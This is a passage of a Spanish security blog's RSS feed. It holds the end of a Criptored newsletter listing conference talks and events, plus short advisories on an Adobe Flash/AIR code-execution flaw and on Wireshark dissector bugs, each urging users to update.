&lt;a href="http://www.criptored.upm.es/descarga/ConferenciaAntonioRamosTASSI2013.pdf"&gt;&lt;span lang="EN-GB"&gt;http://www.criptored.upm.es/descarga/ConferenciaAntonioRamosTASSI2013.pdf&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.4. Vídeo de la quinta conferencia UPM TASSI 2013 Seguridad en sistemas: explotando vulnerabilidades (Alejandro Ramos, Security By Default, España) &lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.youtube.com/watch?v=vKSMbOdW2p4"&gt;http://www.youtube.com/watch?v=vKSMbOdW2p4&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.5. Presentación de la quinta conferencia UPM TASSI 2013 Seguridad en sistemas: explotando vulnerabilidades (Alejandro Ramos, Security By Default, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/descarga/ConferenciaAlejandroRamosTASSI2013.pdf"&gt;&lt;span lang="EN-GB"&gt;http://www.criptored.upm.es/descarga/ConferenciaAlejandroRamosTASSI2013.pdf&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.6. Vídeo de la sexta conferencia UPM TASSI 2013 Del disco flexible a la nube: pasado, presente y futuro de la informática forense (Javier Pagès, Informática Forense S.L., España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.youtube.com/watch?v=LGcMDgWXJKQ"&gt;http://www.youtube.com/watch?v=LGcMDgWXJKQ&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.7. Presentación de la sexta conferencia UPM TASSI 2013 Del disco flexible a la nube: pasado, presente y futuro de la informática forense (Javier Pagès, Informática Forense S.L., España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/descarga/ConferenciaJavierPagesTASSI2013.pdf"&gt;http://www.criptored.upm.es/descarga/ConferenciaJavierPagesTASSI2013.pdf&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.8. Vídeo de la séptima conferencia UPM TASSI 2013 Mundo hacking (Román Ramírez, Ferrovial, RootedCON, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.youtube.com/watch?v=jZbLwfQ7aPs"&gt;http://www.youtube.com/watch?v=jZbLwfQ7aPs&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
1.9. Presentación de la séptima conferencia UPM TASSI 2013 Mundo hacking (Román Ramírez, Ferrovial, RootedCON, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/descarga/ConferenciaRomanRamirezTASSI2013.pdf"&gt;http://www.criptored.upm.es/descarga/ConferenciaRomanRamirezTASSI2013.pdf&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;2. DOCUMENTOS RECOMENDADOS DE OTROS SERVIDORES EN EL MES DE MAYO DE 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
2.1. Libro Cifrado de las comunicaciones digitales. De la cifra clásica al algoritmo RSA (Alfonso Muñoz UC3M y Jorge Ramió UPM, España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://0xword.com/libros/36-libro-cifrado-comunicaciones-rsa.html"&gt;http://0xword.com/libros/36-libro-cifrado-comunicaciones-rsa.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
2.2. Newsletter de la revista Red Seguridad del mes de mayo de 2013 (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.redseguridad.com/newsletter/preview/8619/51/0/seguridad/Seguridad"&gt;http://www.redseguridad.com/newsletter/preview/8619/51/0/seguridad/Seguridad&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
2.3. Cultura de seguridad de la información. Custodio de la ventaja competitiva empresarial (Jeimy Cano, Blog IT-Insecurity, Colombia)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://insecurityit.blogspot.com.es/2013/04/cultura-de-seguridad-de-la-informacion.html"&gt;http://insecurityit.blogspot.com.es/2013/04/cultura-de-seguridad-de-la-informacion.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;3. VII CONGRESO CIBSI Y II TALLER TIBETS PANAMA OCTUBRE 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El Comité de Programa se encuentra evaluando los 43 trabajos recibidos. &lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Entregará la relación de trabajos aceptados el 15 de junio de 2013.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Web: &lt;/span&gt;&lt;a href="http://www.cibsi.utp.ac.pa/"&gt;&lt;span lang="EN-GB"&gt;http://www.cibsi.utp.ac.pa/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Twitter: &lt;a href="https://twitter.com/utpCIBSI"&gt;https://twitter.com/utpCIBSI&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;4. RELACION CRONOLOGICA DE CONGRESOS, SEMINARIOS Y CONFERENCIAS DESTACADAS&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;4.01. Junio 3 al 7 de 2013: 7th IFIP International Conference on Trust Management (Málaga - España)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;4.02. Junio 18 de 2013: Third International Workshop on Information Systems Security Engineering (&lt;st1:country-region w:st="on"&gt;&lt;st1:place w:st="on"&gt;Valencia&lt;/st1:place&gt;&lt;/st1:country-region&gt; - España)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.03. Junio 19 al 21 de 2013: XIII Jornadas Nacionales de Seguridad Informática (Bogotá - Colombia)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;4.04. Julio 3 al 7 de 2013: Tenth International Workshop on Security In Information Systems WOSIS-2013 (&lt;st1:city w:st="on"&gt;&lt;st1:place w:st="on"&gt;Angers&lt;/st1:place&gt;&lt;/st1:city&gt; - Francia)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.05. Julio 10 al 12 de 2013: XIX Jornadas sobre &lt;st1:personname productid="la Enseñanza Universitaria" w:st="on"&gt;&lt;st1:personname productid="la Enseñanza" w:st="on"&gt;la Enseñanza&lt;/st1:personname&gt; Universitaria&lt;/st1:personname&gt; de &lt;st1:personname productid="la Informática JENUI" w:st="on"&gt;la Informática  JENUI&lt;/st1:personname&gt; 2013 (Castellón de &lt;st1:personname productid="la Plana" w:st="on"&gt;la Plana&lt;/st1:personname&gt; - España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.06. Julio 10 al 12 de 2013: XI Conferencia Internacional Privacy, Security and Trust PST 2013 (Tarragona - España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.07. Agosto 12 al 16 de 2013: Primer Congreso Internacional de Seguridad Informática CSI 2013 (Pereira - Colombia)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.08. Septiembre 12 al 13 de 2013: Congreso Internacional en Innovación y Apropiación de las Tecnologías de &lt;st1:personname productid="la Información" w:st="on"&gt;la Información&lt;/st1:personname&gt; y las Comunicaciones CIINATIC 2013 (Bucaramanga - Colombia)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;4.09. Septiembre 12 al 13 de 2013: 8th International Workshop on Data Privacy Management (Royal Holloway - Reino Unido)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;4.10. Septiembre 16 al 18 de 2013: 8th International Workshop on Critical Information Infrastructures Security (&lt;st1:city w:st="on"&gt;&lt;st1:place w:st="on"&gt;Amsterdam&lt;/st1:place&gt;&lt;/st1:city&gt; - Holanda)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.11. Octubre 29 al 31 de 2013: VII Congreso Iberoamericano de Seguridad Informática CIBSI 2013 (Ciudad de Panamá - Panamá)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.12. Octubre 29 al 31 de 2013: II segundo Taller Iberoamericano de Enseñanza e Innovación Educativa en SI TIBETS 2013 (Ciudad de Panamá - Panamá)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
4.13. Noviembre 1 al 2 de 2013: No cON Name 2013 (Barcelona - España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Más información en:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/paginas/eventos.htm#Congresos"&gt;http://www.criptored.upm.es/paginas/eventos.htm#Congresos&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;5. FUE TAMBIEN NOTICIA EN &lt;st1:personname productid="LA RED TEMATICA" w:st="on"&gt;LA RED TEMATICA&lt;/st1:personname&gt; EN EL MES DE MAYO DE 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.1. V Encuentro de Seguridad Integral SEG2 de la revista Red Seguridad en Madrid, 11 de junio (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.2. Call For Papers para el congreso No cON Name 2013 de Barcelona (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.3. CFP Congreso Internacional en Innovación y Apropiación de las Tecnologías de &lt;st1:personname productid="la Información" w:st="on"&gt;la Información&lt;/st1:personname&gt; y las Comunicaciones CIINATIC 2013 (Colombia)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.4. IV Jornada gratuita de Informática y Nuevas Tecnologías en Universidad Europea Miguel de Cervantes UEMC (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.5. Sexta edición del curso de Seguridad Telemática de &lt;st1:personname productid="la Universidad" w:st="on"&gt;la  Universidad&lt;/st1:personname&gt; de Vigo del 10 al 13 de junio (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.6. XV edición del curso de especialización para Diplomado en Seguridad en Tecnología Informática y Telecomunicaciones (Venezuela)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.7. II Jornadas Gratuitas de Seguridad Informática ConectaCon 2013 en Jaén (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.8. Seminario gratuito La supervivencia de la seguridad: inteligencia operativa + inteligencia analítica en Espacio tiSec (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
5.9. Curso de Perito Informático Forense en &lt;st1:personname productid="la Universidad Rovira" w:st="on"&gt;la  Universidad Rovira&lt;/st1:personname&gt; i Virgili (España)&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Acceso al contenido de estas noticias:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/paginas/historico2013.htm#may13"&gt;http://www.criptored.upm.es/paginas/historico2013.htm#may13&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;6. OTROS DATOS DE INTERES Y ESTADISTICAS DE &lt;st1:personname productid="LA RED TEMATICA" w:st="on"&gt;LA RED TEMATICA&lt;/st1:personname&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
6.1. Número actual de miembros en la red: 937&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/paginas/particulares.htm"&gt;http://www.criptored.upm.es/paginas/particulares.htm&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
6.2. Estadísticas Criptored: 52.876 visitas, con 157.249 páginas solicitadas y 67,06 Giga servidos en mayo de 2013, descargándose 31.269 archivos zip o pdf&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/estadisticas/awstats.www.criptored.upm.es.html"&gt;http://www.criptored.upm.es/estadisticas/awstats.www.criptored.upm.es.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Redes sociales: 185 seguidores en facebook y 1.631 seguidores en twitter&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
6.3. Estadísticas Intypedia: 11.397 reproducciones de vídeos en mayo de 2013&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/paginas/intypediamensual.htm#estadisticasyoutubeacumuladas"&gt;http://www.criptored.upm.es/paginas/intypediamensual.htm#estadisticasyoutubeacumuladas&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Redes sociales: 1.362 seguidores en facebook y 898 seguidores en twitter&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
6.4. Estadísticas Crypt4you: 17.660 accesos en mayo de 2013&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/paginas/crypt4youmensual.htm#mayo2013"&gt;http://www.criptored.upm.es/paginas/crypt4youmensual.htm#mayo2013&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Redes sociales: 769 seguidores en facebook y 480 seguidores en twitter&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Jorge Ramió Aguirre&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Director de Criptored&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
twitter: &lt;a href="http://twitter.com/#%21/criptored"&gt;http://twitter.com/#!/criptored&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/H2tPR9qIdPM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/H2tPR9qIdPM/nuevos-contenidos-en-la-red-tematica.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-D9ViSMzHSUw/Ty-mcEw_V4I/AAAAAAAAAQU/fAXySukyGtw/s72-c/logo_criptored.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/nuevos-contenidos-en-la-red-tematica.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-8690353423090151278</guid><pubDate>Sat, 15 Jun 2013 08:31:00 +0000</pubDate><atom:updated>2013-06-15T13:12:20.852+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AIR</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Adobe</category><category domain="http://www.blogger.com/atom/ns#">Flash</category><title>Ejecución de código arbitrario a través de Adobe Flash Player y AIR</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Adobe ha publicado &lt;/span&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb13-16.html" style="font-size: 13pt;"&gt;un solo boletín de seguridad APSB13-16&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt;, que corrige &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;una grave vulnerabilidad que permite la ejecución de código arbitrario en Flash Player y AIR.&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iPcds0mYo30/TtdjE5C7yqI/AAAAAAAAAFU/sddvzfZivEY/s1600/adobe-logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-iPcds0mYo30/TtdjE5C7yqI/AAAAAAAAAFU/sddvzfZivEY/s1600/adobe-logo.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
Adobe Flash Player es un popular reproductor de archivos flash en Internet. Se usa para todo tipo de animaciones en anuncios de páginas. Adobe AIR es un entorno para hacer aplicaciones (incluidas de escritorio) que engloba varias tecnologías como Flash, HTML y AJAX.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La vulnerabilidad, publicada en el boletín APSB13-&lt;st1:metricconverter productid="16, ha" w:st="on"&gt;16, ha&lt;/st1:metricconverter&gt; sido descubierta por Mateusz Jurczyk y Ben Hawkes del equipo de seguridad de Google y se le ha asignado el CVE-2013-3343. Afecta a las últimas versiones tanto de Flash Player (11.x) como de AIR (3.7.x) para todas las plataformas que los soportan (Windows, Macintosh, Linux, Android 2.x, 3.x y 4.x) y podría causar una corrupción de memoria del equipo (bloqueo) y, potencialmente, una ejecución de código, por ello ha sido considerada como crítica por Adobe (nivel 5).&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El fabricante recomienda actualizar &lt;a href="http://get.adobe.com/es/flashplayer/"&gt;a las últimas versiones tanto de Flash Player&lt;/a&gt; como &lt;a href="http://get.adobe.com/es/air/"&gt;de Adobe AIR&lt;/a&gt; desde su página de descargas, desde Google Play o Amazon Marketplace.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Security updates available for Adobe Flash Player&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.adobe.com/support/security/bulletins/apsb13-16.html"&gt;&lt;span lang="EN-GB"&gt;http://www.adobe.com/support/security/bulletins/apsb13-16.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Get Adobe Flash Player&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://get.adobe.com/es/flashplayer/"&gt;&lt;span lang="EN-GB"&gt;http://get.adobe.com/es/flashplayer/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Get Adobe AIR&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://get.adobe.com/es/air/"&gt;&lt;span lang="EN-GB"&gt;http://get.adobe.com/es/air/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Antonio Sánchez&lt;/div&gt;
&lt;br /&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:asanchez@hispasec.com"&gt;asanchez@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/LNV-Fn4rWD4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/LNV-Fn4rWD4/ejecucion-de-codigo-arbitrario-traves.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-iPcds0mYo30/TtdjE5C7yqI/AAAAAAAAAFU/sddvzfZivEY/s72-c/adobe-logo.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/ejecucion-de-codigo-arbitrario-traves.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-7171109998271056060</guid><pubDate>Fri, 14 Jun 2013 08:23:00 +0000</pubDate><atom:updated>2013-06-14T20:18:28.897+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">wireshark</category><title>Wireshark vuelve a corregir 10 vulnerabilidades en algo menos de un mes</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Se
han publicado &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;10 boletines de seguridad
para la popular aplicación de auditoría Wireshark&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; que afectan a la rama &lt;/span&gt;&lt;a href="http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html" style="font-size: 13pt;"&gt;1.6&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; y &lt;/span&gt;&lt;a href="http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html" style="font-size: 13pt;"&gt;1.8&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt;. A
mediados de mayo, la aplicación ya publicó nueve boletines de seguridad para corregir
otras tantas vulnerabilidades para este software.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-_pbGYj3BybI/TxRpOA1s6WI/AAAAAAAAANU/uTQnaqV7NxE/s1600/logo_wireshark.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-_pbGYj3BybI/TxRpOA1s6WI/AAAAAAAAANU/uTQnaqV7NxE/s1600/logo_wireshark.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Wireshark es una aplicación de auditoría
orientada al análisis de tráfico en redes. Su popularidad es muy elevada,
puesto que soporta una gran cantidad de protocolos y es de fácil manejo. Además
Wireshark es software libre (sujeto a licencia GPL) y se ejecuta sobre la
mayoría de sistemas operativos Unix y compatibles, así como en Microsoft
Windows.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Los boletines actuales corrigen
múltiples errores en los disectores DCP ETSI, CAPWAP, GMR-1 BCCH, PPP, NBAP,
RDP, GSM CBCH, Assa Abloy R3, HTTP e Ixia IxVeriWave.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Todos ellos podrían causar el
cuelgue de la aplicación mediante paquetes diseñados especialmente para ello,
ya sean capturados o cargados de un archivo.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El fabricante recomienda &lt;b&gt;actualizar la rama &lt;st1:metricconverter productid="1.8 a" w:st="on"&gt;1.8 a&lt;/st1:metricconverter&gt; la versión 1.8.7 y la
rama &lt;st1:metricconverter productid="1.6 a" w:st="on"&gt;1.6 a&lt;/st1:metricconverter&gt;
la versión 1.6.16&lt;/b&gt;. La versión 1.8.8 se puede descargar de la página web del
fabricante &lt;a href="http://www.wireshark.org/download.html"&gt;http://www.wireshark.org/download.html&lt;/a&gt;
aunque &lt;b&gt;es recomendable actualizar a la
versión 1.10.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Wireshark 1.8.8 Release Notes&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html"&gt;http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Wireshark 1.6.16 Release Notes&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;a href="http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html"&gt;&lt;span lang="EN-GB"&gt;http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB"&gt;Wireshark
Downloads&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;a href="http://www.wireshark.org/download.html"&gt;&lt;span lang="EN-GB"&gt;http://www.wireshark.org/download.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
